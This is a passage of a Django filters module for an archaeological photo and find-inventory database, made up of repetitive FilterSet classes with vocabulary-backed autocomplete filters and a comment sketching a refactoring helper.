help_text=Fotosgescannt._meta.get_field('access').help_text,
label=Fotosgescannt._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Fotosgescannt._meta.get_field('site_id').help_text,
label=Fotosgescannt._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Fotosgescannt._meta.get_field('equipment_scan').help_text,
label=Fotosgescannt._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Fotosgescannt._meta.get_field('source_original_copy_edited_copy').help_text,
label=Fotosgescannt._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=Fotosgescannt._meta.get_field('archaeological_object_type').help_text,
label=Fotosgescannt._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_type"
),
help_text=Fotosgescannt._meta.get_field('find_type').help_text,
label=Fotosgescannt._meta.get_field('find_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=Fotosgescannt._meta.get_field('find_material').help_text,
label=Fotosgescannt._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Fotosgescannt._meta.get_field('excavation_post_excavation').help_text,
label=Fotosgescannt._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fotosgescannt
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'filename',
'document_id',
'document_title',
'filename_old',
'film_number',
'photo_number',
'creation_date_original',
'excavation_id',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'document_type',
'resolution_scan_ppi',
'pixel_size',
'find_inventory_number',
'excavation_object_id',
'archaeological_object_id',
'season',
'original_comment',
'digitisation_comment',
'film_id',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'archaeological_object_type',
'find_type',
'find_material',
'excavation_post_excavation',
]

class Fundinventar4DPuzzleIDListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('legacy_id').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('fc_name').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('fc_directory').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('fc_type').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('fc_filename').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('fc_extension').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('fc_extension').verbose_name
    )
    find_inventory_4dpuzzle_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('find_inventory_4dpuzzle_number').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('find_inventory_4dpuzzle_number').verbose_name
    )
    find_local_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('find_local_number').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('find_local_number').verbose_name
    )
    convolute_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('convolute_inventory_number').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('convolute_inventory_number').verbose_name
    )
    corresponding_to_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('corresponding_to_inventory_number').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('corresponding_to_inventory_number').verbose_name
    )
    find_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('find_comment').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('find_comment').verbose_name
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_comment').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('stratum_comment').verbose_name
    )
    storage_find = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('storage_find').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('storage_find').verbose_name
    )
    relatedto = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="relatedto"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('relatedto').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('relatedto').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/relatedto",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('find_material').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fundinventar4DPuzzleID._meta.get_field('digitisation_comment').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
    )
    find_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_type"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('find_type').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('find_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('access').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="uncertainty_excavation_digitisation"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('uncertainty_excavation_digitisation').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    creator_metadata = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="creator_metadata"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('creator_metadata').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('creator_metadata').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/creator_metadata",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    archaeological_object_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="archaeological_object_id"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('archaeological_object_id').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('archaeological_object_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/archaeological_object_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_relative"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_id_relative').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('stratum_id_relative').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_absolute_prepub"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    phase_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="phase_id"
        ),
        help_text=Fundinventar4DPuzzleID._meta.get_field('phase_id').help_text,
        label=Fundinventar4DPuzzleID._meta.get_field('phase_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/phase_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Fundinventar4DPuzzleID
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'excavation_object_id',
            'find_inventory_4dpuzzle_number',
            'find_local_number',
            'convolute_inventory_number',
            'corresponding_to_inventory_number',
            'find_comment',
            'stratum_comment',
            'find_date',
            'storage_find',
            'relatedto',
            'find_material',
            'digitisation_comment',
            'find_type',
            'access',
            'uncertainty_excavation_digitisation',
            'creator_metadata',
            'archaeological_object_id',
            'stratum_id_relative',
            'stratum_id_absolute_prepub',
            'phase_id',
        ]

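# NOTE: the SkosConcept-backed filters in these FilterSets all repeat the
# same ModelMultipleChoiceFilter boilerplate. A possible refactor is a small
# module-level factory; this is an untested sketch, and the name
# `skos_concept_filter` is illustrative, not part of the original module:
#
# def skos_concept_filter(model, field_name):
#     # Build the standard vocabulary filter for `field_name` on `model`.
#     field = model._meta.get_field(field_name)
#     return django_filters.ModelMultipleChoiceFilter(
#         queryset=SkosConcept.objects.filter(collection__name=field_name),
#         help_text=field.help_text,
#         label=field.verbose_name,
#         method=generous_concept_filter,
#         widget=autocomplete.Select2Multiple(
#             url="/vocabs-ac/specific-concept-ac/{}".format(field_name),
#             attrs={
#                 'data-placeholder': 'Autocomplete ...',
#                 'data-minimum-input-length': 2,
#             },
#         )
#     )
#
# Each declaration would then collapse to e.g.:
#     phase_id = skos_concept_filter(Fundinventar4DPuzzleID, 'phase_id')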
class FundinventarInventarnummernListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('legacy_id').help_text,
        label=FundinventarInventarnummern._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('fc_name').help_text,
        label=FundinventarInventarnummern._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('fc_directory').help_text,
        label=FundinventarInventarnummern._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('fc_type').help_text,
        label=FundinventarInventarnummern._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('fc_filename').help_text,
        label=FundinventarInventarnummern._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('fc_extension').help_text,
        label=FundinventarInventarnummern._meta.get_field('fc_extension').verbose_name
    )
    find_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('find_inventory_number').help_text,
        label=FundinventarInventarnummern._meta.get_field('find_inventory_number').verbose_name
    )
    find_local_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('find_local_number').help_text,
        label=FundinventarInventarnummern._meta.get_field('find_local_number').verbose_name
    )
    convolute_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('convolute_inventory_number').help_text,
        label=FundinventarInventarnummern._meta.get_field('convolute_inventory_number').verbose_name
    )
    find_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('find_comment').help_text,
        label=FundinventarInventarnummern._meta.get_field('find_comment').verbose_name
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('find_material').help_text,
        label=FundinventarInventarnummern._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_type"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('find_type').help_text,
        label=FundinventarInventarnummern._meta.get_field('find_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('stratum_comment').help_text,
        label=FundinventarInventarnummern._meta.get_field('stratum_comment').verbose_name
    )
    stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_relative"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('stratum_id_relative').help_text,
        label=FundinventarInventarnummern._meta.get_field('stratum_id_relative').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    storage_find = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('storage_find').help_text,
        label=FundinventarInventarnummern._meta.get_field('storage_find').verbose_name
    )
    stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_absolute_prepub"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('stratum_id_absolute_prepub').help_text,
        label=FundinventarInventarnummern._meta.get_field('stratum_id_absolute_prepub').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    phase_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="phase_id"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('phase_id').help_text,
        label=FundinventarInventarnummern._meta.get_field('phase_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/phase_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    relatedto = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="relatedto"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('relatedto').help_text,
        label=FundinventarInventarnummern._meta.get_field('relatedto').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/relatedto",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('access').help_text,
        label=FundinventarInventarnummern._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarInventarnummern._meta.get_field('digitisation_comment').help_text,
        label=FundinventarInventarnummern._meta.get_field('digitisation_comment').verbose_name
    )
    uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="uncertainty_excavation_digitisation"
        ),
        help_text=FundinventarInventarnummern._meta.get_field('uncertainty_excavation_digitisation').help_text,
        label=FundinventarInventarnummern._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = FundinventarInventarnummern
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'archaeological_object_id',
            'corresponding_to_inventory_number',
            'find_inventory_number',
            'find_local_number',
            'convolute_inventory_number',
            'find_comment',
            'excavation_object_id',
            'find_material',
            'find_type',
            'stratum_comment',
            'stratum_id_relative',
            'find_date',
            'storage_find',
            'stratum_id_absolute_prepub',
            'phase_id',
            'relatedto',
            'access',
            'digitisation_comment',
            'uncertainty_excavation_digitisation',
        ]

class FundinventarKonvolutnummernListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('legacy_id').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('fc_name').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('fc_directory').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('fc_type').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('fc_filename').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('fc_extension').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('fc_extension').verbose_name
    )
    convolute_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('convolute_inventory_number').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('convolute_inventory_number').verbose_name
    )
    convolute_subnumber = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('convolute_subnumber').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('convolute_subnumber').verbose_name
    )
    find_local_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('find_local_number').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('find_local_number').verbose_name
    )
    corresponding_to_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('corresponding_to_inventory_number').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('corresponding_to_inventory_number').verbose_name
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('find_material').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('find_comment').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('find_comment').verbose_name
    )
    find_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_type"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('find_type').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('find_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_relative"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('stratum_id_relative').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('stratum_id_relative').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('stratum_comment').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('stratum_comment').verbose_name
    )
    stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_absolute_prepub"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('stratum_id_absolute_prepub').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('stratum_id_absolute_prepub').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    phase_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="phase_id"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('phase_id').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('phase_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/phase_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    storage_find = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="storage_find"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('storage_find').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('storage_find').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/storage_find",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('access').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    relatedto = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('relatedto').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('relatedto').verbose_name
    )
    uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="uncertainty_excavation_digitisation"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('uncertainty_excavation_digitisation').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarKonvolutnummern._meta.get_field('digitisation_comment').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('digitisation_comment').verbose_name
    )
    creator_metadata = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="creator_metadata"
        ),
        help_text=FundinventarKonvolutnummern._meta.get_field('creator_metadata').help_text,
        label=FundinventarKonvolutnummern._meta.get_field('creator_metadata').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/creator_metadata",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = FundinventarKonvolutnummern
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'convolute_inventory_number',
            'convolute_subnumber',
            'find_local_number',
            'corresponding_to_inventory_number',
            'find_material',
            'find_comment',
            'excavation_object_id',
            'archaeological_object_id',
            'find_type',
            'stratum_id_relative',
            'stratum_comment',
            'stratum_id_absolute_prepub',
            'find_date',
            'phase_id',
            'storage_find',
            'access',
            'relatedto',
            'uncertainty_excavation_digitisation',
            'digitisation_comment',
            'creator_metadata',
        ]

